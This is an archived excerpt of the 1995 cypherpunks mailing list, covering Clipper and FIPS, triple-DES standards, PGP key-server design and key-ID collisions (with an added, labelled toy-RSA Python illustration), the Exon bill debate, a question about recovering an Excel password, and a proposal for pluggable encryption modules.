 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Mon, 13 Feb 95 16:12:14 PST
To: cypherpunks@toad.com
Subject: What *is* the power of the FIPS
Message-ID: <Pine.3.89.9502131927.B13826-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



Friends,
-	My editor from the Covert Action Quarterly called with a question 
on a piece I've authored on the NSA's involvement in the development of 
the digital telephony bill. I animated the characters and campaign 
strategies in this narrative common to the clipper and DT initiatives. In 
that, talking about Clipper I mentioned its rise as a FIPS, etc. 
-	QUESTION: Just what is the power of the FIPS outside of the 
interop issues in sending stuff back and forth from federal agencies?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bwern@jax.jaxnet.com (Ben Wern)
Date: Mon, 13 Feb 95 16:19:24 PST
To: cypherpunks@toad.com
Subject: Excel 5 Encryption
Message-ID: <199502140019.TAA23023@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings one and all,

I was wondering if anyone out there has played with or 'broken' Microsloth's
encryption, especially in its Excel form?

The story goes like this: A good friend of mine has an executive who stored
a lot of data in excel, with his own password. He has died, and the
company would very much like to get ahold of that corporate data. Microsoft
has chuckled politely at helping them (they're a rather large company), and
my friend has approached me... I don't have any experience with Microsoft
encryption.. but I know that the likes of WP can be broken, so I was
wondering if something similar to the cracks of that. 

ANY thoughts, comments, anecdotes, etc, etc. would be greatly appreciated.
I'll post a summary to the list, if you send privately. 

Danke,

Ben Wern
(Hopefully this satisfies enough of the Cypherpunks-related content to avoid
scorch marks... :) )

bwern@jax.jaxnet.com
bwern@pathtech.com 
bwern@unf6.cis.unf.edu

PGP Key Available by Request! 
PGP mail gets preferred treatment!
Ask for it by name!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Feb 95 16:31:45 PST
To: cypherpunks@toad.com
Subject: Re: What *is* the power of the FIPS
Message-ID: <v01510101ab6566ac8d4d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>-       QUESTION: Just what is the power of the FIPS outside of the
>interop issues in sending stuff back and forth from federal agencies?

Eh? Say again?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 19:42:42 PST
To: cypherpunks@toad.com
Subject: Distributed Key Service for PGP (was: why pgp sucks)
Message-ID: <9502140340.AA28899@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
> >Doesn't having some kind of central record of keys go against
> >the principle of PGP?  
> 
> The only "principle" of which I'm aware (and particularly interested
> in supporting) is that of having widely fielded, useful and strong
> privacy and authentication tools that work properly and transparently.
> That means, among a great many other things, flexible protocols
> and tools that support remote key distribution services.

Another main principle of PGP is that it _has_ to be able to work
in a decentralized fashion, so it's usable by
> the civilizing forces of Anarchy (PGP?)
even if the most common uses are in the centralized wired real-world.

Perry and others write:
[ lots of things about the need for distributed scalable key servers ]
[ particularly the numeric-only IDs. ]
There are two main times you need to get PGP keys -
encrypting a message to someone, and validating a signature from someone.

The former can be distributed easily enough - use something DNS-like
to serve keys for joe_user@foo.bar.com, and add them to your local
keyring if they're not there (possibly with temporary keyrings,
if that's easy enough on PGP version N.) 
Fetching keys needs to be a separate tool from PGP anyway,
since PGP should be general enough to work on wired and unwired systems,
with different protocols and APIs for using the available networks.
(And of course, the fetched keys need to be validated using web_of_trust
or whatever, adding yet another step.)  Sounds like a job for a shell...

The latter problem is more difficult - partly PGP's fault, but partly 
because the underlying problem is harder.  Signed documents _may_
arrive from keyids not on the keyservers, whether they're from
non-wired users, users who wish to remain pseudonymous,
one-or-two-use keys, etc....  What PGP can be blamed for, which will
hopefully be addressed in version 3.x, is that it's possible to have
collisions in the abbreviated key_ids, especially for the optional
short key_ids that have been requested as an added feature for people
who _very strongly_ want to remain anonymous.
(There have already been collisions in the 24-bit key_ids,
and it's been shown that it's possible to generate arbitrary key_ids
if you _want_ to cause a collision, as well as birthday-problem 
probabilities of random collisions.)

One way to address it is to make it easy to loop through a bunch
of keys with the same key_id, which is a bit tough given PGP's current
MS-DOS-like interface.  Another way is out-of-band attachment of the
user_id with the message, followed by DNS-like lookup, or attachment of
the signature key with the message, accompanied by a lookup to validate it.

As Matt said, there's a lot of policy-vs-mechanism issues here;
PGP version 3.0 will have some library support that makes it
easier to build some of these things.

		Bill
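
Added example, not part of the original message or of PGP's code: treating an abbreviated key_id as a lookup hint and looping through every key that shares it, plus the birthday-problem estimate for random collisions. It assumes the PGP 2.x convention that a key ID is the low-order bits of the RSA modulus; ToyKey, Keyring, the tiny primes and the 8-bit ID width are constructed for illustration and provide no security.

```python
"""Short key IDs as hints: collision odds and a keyring that tries every match."""
import hashlib
import math
from collections import defaultdict


def collision_probability(num_keys, id_bits):
    """Birthday estimate that at least two of num_keys random IDs coincide."""
    x = num_keys * (num_keys - 1) / (2.0 * 2 ** id_bits)
    return -math.expm1(-x)  # 1 - exp(-x), accurate for very small x


class ToyKey:
    """Textbook RSA over tiny primes (constructed; illustration only)."""

    def __init__(self, user_id, p, q, e=65537):
        self.user_id = user_id
        self.n = p * q
        self.e = e
        self._d = pow(e, -1, (p - 1) * (q - 1))  # private exponent

    def key_id(self, bits):
        """Abbreviated key ID: the low-order bits of the modulus."""
        return self.n & ((1 << bits) - 1)

    def _digest(self, message):
        return int.from_bytes(hashlib.sha256(message).digest(), "big") % self.n

    def sign(self, message):
        return pow(self._digest(message), self._d, self.n)

    def verify(self, message, signature):
        return pow(signature, self.e, self.n) == self._digest(message)


class Keyring:
    """Keys filed by abbreviated ID; one ID may map to several keys."""

    def __init__(self, id_bits):
        self.id_bits = id_bits
        self._by_id = defaultdict(list)

    def add(self, key):
        """Store key and return the user IDs already filed under its short ID."""
        bucket = self._by_id[key.key_id(self.id_bits)]
        clashes = [k.user_id for k in bucket]
        bucket.append(key)
        return clashes

    def candidates(self, short_id):
        return list(self._by_id.get(short_id, []))

    def verify(self, message, signature, short_id):
        """Try every candidate key; return the user IDs whose key verifies.

        An empty list covers both "no such key on this ring" and "bad signature".
        """
        return [k.user_id for k in self.candidates(short_id)
                if k.verify(message, signature)]


# Constructed keys whose moduli share the same low 8 bits (0xA1).
ALICE = ToyKey("alice@example.org", 769, 929)
BOB = ToyKey("bob@example.org", 257, 673)
MESSAGE = b"constructed sample message"


def demo():
    ring = Keyring(id_bits=8)
    first = ring.add(ALICE)
    second = ring.add(BOB)  # reports the clash with Alice's key
    signature = ALICE.sign(MESSAGE)
    short_id = ALICE.key_id(8)
    return {
        "clash_on_add": (first, second),
        "candidates": [k.user_id for k in ring.candidates(short_id)],
        "verified_by": ring.verify(MESSAGE, signature, short_id),
        "tampered": ring.verify(MESSAGE + b"!", signature, short_id),
        "unknown_id": ring.verify(MESSAGE, signature, 0x00),
    }


if __name__ == "__main__":
    for bits in (24, 32, 64):
        print(bits, "bit IDs, 4823 keys:", collision_probability(4823, bits))
    print(demo())
```
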




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 13 Feb 95 21:17:41 PST
To: cypherpunks@toad.com
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
Message-ID: <199502140518.VAA22900@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> One is forced to wonder at the sort of person that can with a straight
> face argue that on the one hand an algorithm is cryptographically
> unsound, while at the same time posing a threat to national security.
> 

A lawyer, of course ... ;-}


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 13 Feb 95 17:12:35 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132043.AA17858@toad.com>
Message-ID: <199502140114.UAA17825@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


CDT writes:
> The NSA's efforts to push the adoption of the Clipper/Skipjack 
> government-escrowed encryption scheme encountered a major 
> setback earlier this month with the decision by the 
> Accredited Standards Committee X9 to proceed with the 
> development of a data security standard based on triple-DES.    
> 
> The ASC X9 committee is responsible for setting data security 
> standards for the US banking and financial services 
> industries.

Are the minutes of the deliberations of X9, in complete or digest form,
available to the public anywhere ? It would be useful to get a sense of how
close the vote was, whose representatives voted which way, and the arguments
the members found most compelling in reaching their decision. We need to
gather as much feedback as possible, in order to determine which strategies
are liable to be effective in the future. The answers may not come as a
surprise, but confirmation of our suspicions would be nice.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 13 Feb 95 21:17:47 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Is Cyberspace Rich Enough?
Message-ID: <199502140518.VAA22903@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



One of the problems commenting on long thoughtful posts is the number 
of hooks, and limiting oneself to just a few.

	[delete lots of interesting stuff]

> 
> ... After all, the Soviets
> couldn't stop samizdats, the Chinese couldn't stop fax machines, and
> the Americans can't stop drug use, so what hope is there in
> controlling modems, crypto, cellular phones, satellites, Web links,
> steganography, terabytes of data flowing unobstructed across borders,
> and so on. Just to "stop the Net" would disrupt the entire financial
> system, which not even Clinton or the next (Republican) President
> would be tempted to do....they might as well launch a nuclear war as
> try to shut down this "anarchic" ( = high dimensionality) system.
> 

Well, I certainly hope so.  But let's remember Poland in 1979, where 
"they" were desperate enough to shut down the entire phone system.  
It gained them only an extra 10 years of control, but it cost the 
Poles a *lot* of misery.

But "samizdat" raises an interesting economic issue around security.  
The Soviets paid just enough attention to the circulation of 
hand-written or typed copies to make sure people spent a lot of time 
and energy at it -- time and energy not spent on more obviously 
dangerous activity.   Compare the volume of Solzhenitsyn's output 
before and after exile [let's not debate quality].  That didn't mean 
samizdat wasn't subversive and long-term dangerous -- but it was very 
expensive and absorbing to dissidents and potential dissidents.

But that's the situation cypherpunks [and friends :] want to put our 
hypothetical eavesdroppers [government or corporate] in.  Not exactly 
harmless, but spending a lot of time and energy being concerned with 
the chasing multiple carbon copies of samizdat novellas.


> 
> * Alternative Nets, like FIDONet, are often lost in the discussion of
> "the Net," but perhaps we should take much greater interest in these
> alternatives. They make a crackdown harder, they lessen the dangers of
> a single-point attack, and they provide "genetic diversity" for
> building future Nets. (I'm not saying Cypherpunks have the time,
> expertise, or incentive to work on this, but just reminding folks that
> the Internet is not the end all and be all...)
> 

I find that techno-illiterate Greens have very little trouble 
understanding FIDONet -- it's the kind of small-scale organizing 
within larger networks that a lot of progressive activity has always 
followed.  They find it very hard to believe that other kinds of 
techie nets are really secure in the long run.  It is, in fact, the 
level of activity that the Poles reverted to without the phone 
system ...

> Personally, I think there are fewer long essays and analyses for the
> same reason there are fewer large predators than grass-munching
> herbivores.
> 
> --Tim May
> 

Geez, I have enough trouble getting card-carrying Greens to use 
and/or develop good ecological metaphors without some 
crypto-anarcho-libber punk muscling into the territory!  ;-)


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Mon, 13 Feb 95 18:07:49 PST
To: m5@vail.tivoli.com (Mike McNally)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <9502132259.AA14841@vail.tivoli.com>
Message-ID: <9502140207.AA22303@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally originally said the following...
> 
> 
> gnu@toad.com writes:
>  > In their November letter to X9 committee members, the NSA 
>  > attempted to undermine the attractiveness of triple-DES by 
>  > arguing that it is cryptographically unsound, a potential 
>  > threat to national security, and would not be exportable 
>  > under US law.
> 
> One is forced to wonder at the sort of person that can with a straight
> face argue that on the one hand an algorithm is cryptographically
> unsound, while at the same time posing a threat to national security.
Just playing Devil's Advocate, but maybe he's saying that it's
so faulty that trusting banking communications to it would be a
threat to national security...  You know, it's so faulty it's
dangerous.. Kinda like Dan Quayle for president. *8)

-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 18:18:30 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
Message-ID: <199502140218.VAA03104@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Are they (CNN) going to re-air the discussion? I wasn't able to see it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 13 Feb 95 18:28:51 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <ojDo69v0Eyt50xSXkP@nsb.fv.com>
Message-ID: <9502140226.AA11393@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 13 Feb 1995 06:24:57 -0500 (EST)
    From: Nathaniel Borenstein <nsb@nsb.fv.com>
    
    Excerpts from mail: 12-Feb-95 Re: MIME based remailing co.. Rick
    Busdiecker@lehman.c (1544)
    
    >     Well, I have no idea why you think that MIME is an "atrocity" or
    >     "slime", but it is perfectly clear that you have no idea what it
    >     actually *is*, since "X-" headers have nothing whatsoever to do with
    >     MIME.  The "X-" headers are defined by RFC 822, which has been the
    >     standard for Internet mail formats since 1982.
    
    > You base a large conclusion on a small piece of data in combination
    > with some poor deduction.  Unless you are claiming that MIME violates
    > RFC 822 with respect to the handling of X- headers you have made a
    > number of false claims in the paragraph above.
    
    A very interesting claim.  Care to tell me what my "false claims" are,
    or is it a secret?

One is your claim that ``"X-" headers have nothing whatsoever to do
with MIME.''  This was in response to my suggestion that such headers
were MIME-compliant.  As I said previously, unless you are claiming
that MIME violates the RFC which you referenced, then these headers
are MIME compliant, as I suggested, rather than completely separated
from MIME as you have suggested.

The other is that I ``have no idea what [MIME] is''.  I may not know
as much as I should, by your judgement, however your claim is still
incorrect -- presumably you were more interested in being
inflammatory than accurate.  Not completely out of place here . . . .

Really, there was nothing very secretive about my previous or current
presentation of the problems with your claims.  For example, you might
note that the first one that I list is simply a rewording of the
message to which you most recently replied.  What was it that was
unclear the first time?  Or *are* you suggesting that MIME violates RFC
822?  Or perhaps I'm just missing something subtle in your reasoning.
If so, could you elaborate?

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Mon, 13 Feb 95 19:35:13 PST
To: cypherpunks@toad.com
Subject: Re: The NSA
In-Reply-To: <199502132058.PAA01939@bb.hks.net>
Message-ID: <qV1GlOwscsyI077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199502132058.PAA01939@bb.hks.net>,
anonymous-remailer@xs4all.nl (Name withheld on request) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>- ----- BEGIN PGP SIGNED MESSAGE HERE ----
>An entity purporting to be Mike Duvos writes:
>
>> Such a situation does not apply solely to the NSA.  There are,
>> for instance, secret lodges of French mystics who devote
>> themselves to higher mathematics, absorb everything the open
>> community produces, and rarely publish anything or draw attention
>> to themselves.  They solve problems, write secret manuscripts,
>
>Actually, the French group is a subsidiary of our Bavarian operation.
>However, "centuries" is, well, somewhat inaccurate, though the 
>mathematician who first mentioned our existence about that time has
>since recanted after a visit from the Elders...
>
>				A.W.

Is that sort of thing like being paid a visit by "The Enforcers" of "Forever
Knight" fame? :>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 13 Feb 95 18:57:54 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950213215125.2820B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 13 Feb 1995, Samuel Kaplin wrote:

> Senator Exon was much more convincing than Mr. Rotenberg. :( Why didn't
> EPIC field someone with better debating skills? A sellout was offered a 
> la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
> interested in the issue. This is not a good omen. The perception left in 
> my non-internet literate wife was that the INTERNET=smut. :(
> 

I assume that Rotenberg was trying to do one thing only which was to try 
and get Exon to state that his bill did not cover ISPs.  He succeeded.  
He was not trying in 5 minutes to score debating points along the lines 
of "pornography, smut, indecency, sex, violence, rapine, and slaughter 
are perfectly legal so long as they do not rise to the level of legal 
obscenity."  That's just the sort of argument that gets the audience to 
think you're nuts and ignore you.  

If the bill doesn't cover ISPs, it is meaningless.  He never actually 
*said* he'd work with Exon.  You have to be very careful on these shows.  
He could, perhaps, have done a little better, but I detected no sellout.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Mon, 13 Feb 95 21:11:56 PST
To: usviszpz@ibmmail.com
Subject: Re: WSJ article on Internet Telephony
In-Reply-To: <9502131947.AA17236@toad.com>
Message-ID: <m0reFXx-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> {The producers of Internet Phone are listed as VocalTec in Tel Aviv, with
> offices in Northvale, NJ; the software is currently $49 (although a demo
> version allowing unlimited 3-min calls is free) and currently requires a 14.4
> kps modem with a Windows 486, sound card & microphone. No Email address for the
> company was given.)

If memory serves, there are several implementations of this technology for
Windows and UNIX - no need to pay $$$...

One implementation is called mtalk, another is called ifone - they are both
for linux.  I think I found them on sunsite.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Tue, 14 Feb 95 01:02:39 PST
To: cypherpunks@toad.com
Subject: Re: Laws, Feds, & the Internet
In-Reply-To: <m0rdBe4-000k50C@mailbox.mcs.com>
Message-ID: <Ki4GlyczB8cA075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0rdBe4-000k50C@mailbox.mcs.com>, 
dls@mcs.com (David Sallach) wrote:

[Rich Dutcher wrote:]

> >"Free" speech has always been a balancing act.  The founders
> >certainly didn't intend to provide "free" speech for blacks and
> >women.  
> 
>         The Founders created a larger space for free speech than had ever
> existed.  Slaves were deprived of many freedoms including speech, of course,
> but women and free blacks were included in the Bill of Rights and exercised
> free speech, frequently compellingly.  

And hard on the heels of the ratification of the Bill of Rights came the
Alien and Sedition Acts.  The Founders were so distressed by the size of
the space for free expression they had allowed to be created that they
took immediate steps to limit it.

It is well to remember that the Bill of Rights was a bone thrown by the
Founders (that is, the Federalists) to sweeten the bitter pill of the
process of centralizing government power.  An afterthought, actually.

> > . . . "They" have never liked "free" speech ... :-(
> 
>         Invoking politically 'correct' stereotypes does not strengthen your
> argument.

Arguing _ad_hominem_ doesn't strengthen yours.

   Alan Bostick           | The nice thing about quotes is that they give   
   abostick@netcom.com    | a nodding acquaintance with the originator
finger for PGP public key | which is often socially impressive.
Key fingerprint:          |         Kenneth Williams
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBL0BNnuVevBgtmhnpAQEe7wL/aNjOHyflJHfcRrHdxa73Xt9Hu8eTD4kx
+gWQpMpeJHLhQk+Gey3epbqXDkjT0YOFI3xUtcjotGRnHhisIbhPztYOCZBxhSLE
WkozOBCZpz2t6a+Z3cPYRH/jBk7aCWBd
=XDZA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Mon, 13 Feb 95 19:32:40 PST
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SUN.3.91.950213215125.2820B-100000@panix.com>
Message-ID: <Pine.LNX.3.91.950213223336.16909A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, Duncan Frissell wrote:

> If the bill doesn't cover ISPs, it is meaningless.  He never actually 
> *said* he'd work with Exon.  You have to be very careful on these shows.  
> He could, perhaps, have done a little better, but I detected no sellout.

Exon can say whatever he wants. Read the bill. There's no "except for 
ISPs" in there anywhere you know.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 13 Feb 95 22:41:38 PST
To: cypherpunks@toad.com
Subject: Internationalism no panacea
Message-ID: <199502140641.WAA18400@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Two recent news stories cast doubt on the principle that the international
aspects of the nets will prevent governments from enforcing their laws
"in cyberspace".

One is the possible trade war between the U.S. and China over that
country's continued support of intellectual property piracy, in video,
audio, and computer software.  Apparently the U.S. is very serious about
imposing sanctions because of this problem, while China is threatening
retaliation.  It is quite amazing to me to see these two big countries
going to the mat over "just bits" but as we know bits are big business
now.

Think of our recent discussions of putting data havens offshore.  If the
U.S. is willing to turn the screws on a nuclear power like China, how
much protection will some dinky Caribbean country offer when people make
Windows 96 and Jurassic II available for download for $5 ecash?  IMO the
trend is going to be toward international enforcement efforts, a general
movement towards uniform information laws.

The other story related to the idea that individuals can evade laws by
moving from country to country as tourists.  Apparently in the recent
budget bill was a little-publicized change in the tax treatment of
people who renounce their U.S. citizenship.  (The change would be retroactive
to last week and was kept quiet until then to prevent a surge of people
leaving.)  Since you earned all your assets as a citizen of the U.S.,
naturally when you leave the grasp of that country you will no longer
get to take it all with you.  Instead you will apparently have to pay
capital gain taxes on some substantial fraction of your assets.

The article I read went on to discuss the problems many countries are
having with people playing citizenship games.  The implication was that
this may be just one step in a crackdown to close many of the loopholes
that allow people to travel under one flag or another.

My take on this is that human ingenuity is sufficient that there will
always be new loopholes found, and that a sufficiently energetic and
motivated person will probably be able to stay one step ahead of the
enforcers.  However, this will not be a lifestyle that can be turned into
a cookbook; as soon as some trick became widely known, the loophole would
be closed.  So this is something which will be available to an elite but
not to the masses.  Hence I don't see "perpetual tourism" as something
which will be a serious threat to government power.

My views are somewhat iconoclastic for this list; I don't see
cryptography as bringing about a libertarian/anarchist state.  I continue
to believe that the best and only way to achieve freedom for the mass of
people is to convince them that it is a good idea.  A small elite can and
will continue to be able to avoid many laws, and crypto will no doubt be
useful to them.  But IMO it is not going to change the shape of society.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBL0BQchnMLJtOy9MBAQGJaAH/WTtd0bYeqKy89AUOSaSdraxN7YNZ2z42
+rJCQH0NS8x3ILT8VT8XtSIuYltBGsQkPagUqYtn3vM/rp3ssPhr/w==
=JFan
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Mon, 13 Feb 95 21:33:13 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: EPIC to Debate Exon on CNN
Message-ID: <m0reFsV-0001f7C@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 13 Feb 1995, Samuel Kaplin wrote:
>>  A sellout was offered a 
>> la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
>> interested in the issue.
>
>You expected something different from "EPIC"?
>
>Cypherpunks are supposed to be paranoid.  You are
>not paranoid enough.
>

I don't think paranoia has anything to do with it. I just expect people to
do the job that they are supposed to do. IMHO Mr. Rotenberg didn't do his
job as well as he should have. I saw numerous opportunities to score salient
points and he didn't. What Senator Exon says and what the bill says are two
different things. I got the feeling that Senator Exon didn't even understand
the ramifications of the bill. The unfortunate part is Joe Blow on the
street isn't going to read the bill. He's going to rely on what he has
heard. In my opinion Mr. Rotenberg didn't correct Senator Exon forcefully
enough. The consummate politician triumphed.

Sam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 13 Feb 95 20:44:56 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ref on crypto formalism
In-Reply-To: <199502140310.TAA23087@jobe.shell.portal.com>
Message-ID: <199502140446.XAA18306@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pierre writes:
> I'm pretty sure I saw somewhere a companion paper titled something
> like "An algebra of authentication"... hmmm  maybe even in CACM...
> [...15 minutes later...] Unfortunately some of my CACMs are in hiding
> and not properly indexed... It was work done at DEC SRC in Palo Alto,
> there must be some research reports too.
> 
> If somebody has refs for any of these, it would be great if you'd
> post them.

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-039.html
SRC Research Report 39	A Logic of Authentication
Michael Burrows, Martin Abadi, and Roger Needham
February 28, 1989	48 pages

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-070.html
SRC Research Report 70	A Calculus for Access Control in Distributed Systems
M. Abadi, M. Burrows, B. Lampson, G. Plotkin
March 4, 1991	52 pages

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-083.html
SRC Research Report 83	Authentication in Distributed Systems: Theory and 
			Practice
Butler Lampson, Martin Abadi, Michael Burrows, Edward Wobber
February 4, 1992

http://ftp.digital.com/pub/DEC/SRC/research-reports/abstracts/src-rr-117.html
SRC Research Report 117	Authentication in the Taos Operating System
Edward Wobber, Martin Abadi, Mike Burrows, and Butler Lampson
December 10, 1993	38 pages




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Mon, 13 Feb 95 22:45:28 PST
To: cypherpunks@toad.com
Subject: Cypher_punks standards, again.
Message-ID: <950214004527.42ba@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Cypherpunks,

Q.  What do I mean, standards?

A.  A set of specifications that will allow encryption modules
    to be incorporated into receptacle encryption interface
    programs easily.

    The advantages of programs that comply with the CP standard
    might be illustrated with an example.

    Suppose Alice wants to use an interface program, say,
    GENPGP.EXE, to encrypt a message to Bob.

    Suppose that GENPGP is an interface encryption receptacle
    program that allows users to add and use their own encryption
    modules of choice.  If Alice were a command line freak, she
    could type:

        GENPGP -RSA_encrypt_the_session_key \
        -random_session_key_source ISA_Johnson_Noise_ADC \
        -chainsession \
        -blowfish -rounds 18 -keylength 2048 \
        -idea \
        -3descfb \
        -compress pkzip \
        -plain_text_file topsec.doc \
        -recipient bob

    Or, suppose Alice is a GUI freak.  In this case she could
    use her entcrypt_lab schematic interface to design and save
    her encryption scheme for topsec.doc, and simply drop the
    icon for the doc into her block diagram's input icon.

    Bob, in either case, is still able to use his own program
    of choice, GNU_safe_mail, to automatically decrypt Alice's
    message to him, so long as Bob has incorporated all of the
    latest modules available.

Q.  What are some advantages?

A.  There are numerous advantages.  Some programmers are good at
    writing user interfaces, and others are better at implementing
    algorithms.  Currently, many programmers of the second type
    make all sorts of encryption algorithms available, but these
    are not always easily understood by programmers of the first
    type, and more importantly, coded algorithms are not easily
    incorporated into existing programs.

    Another problem that may arise is that existing programs,
    and programs that may come out in the next year or two,
    may gain widespread use (e.g. PGP.EXE), but may at some
    time in the future become practically worthless, for
    example, if widely used interface programs rely on
    encryption algorithms that are discovered or perceived
    to be weak.

    If a standard such as the one I am proposing is released
    and gains acceptance, more programmers will comply, and
    this will allow the users of their interfaces to painlessly
    adapt the interface programs.  More importantly, such
    interface programs that make use of CP compliant
    encryption modules will allow users to encrypt as
